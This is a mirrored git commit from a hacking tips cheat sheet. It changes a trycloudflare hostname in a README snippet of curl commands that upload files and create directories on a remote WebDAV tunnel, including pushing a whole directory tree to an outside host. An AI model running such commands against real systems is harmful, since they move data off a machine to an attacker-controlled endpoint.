mirror of
https://github.com/hackerschoice/thc-tips-tricks-hacks-cheat-sheet.git
synced 2026-08-27 02:12:36 +02:00
Update README.md
This commit is contained in:
@@ -834,9 +834,9 @@ wsgidav --port=8080 --root=. --auth=anonymous
|
||||
On another server:
|
||||
```sh
|
||||
# Upload a file to your workstation
|
||||
curl -T file.dat https://structured-foo-bar-lights.trycloudflare.com
|
||||
curl -T file.dat https://example-foo-bar-lights.trycloudflare.com
|
||||
# Create a directory remotely
|
||||
curl -X MKCOL https://structured-foo-bar-lights.trycloudflare.com/sources
|
||||
curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources
|
||||
# Create a directory hirachy remotely
|
||||
find . -type d | xargs -I{} curl -X MKCOL https://example-foo-bar-lights.trycloudflare.com/sources/{}
|
||||
# Upload all *.c files (in parallel):
|
||||
|
||||
Reference in New Issue
Block a user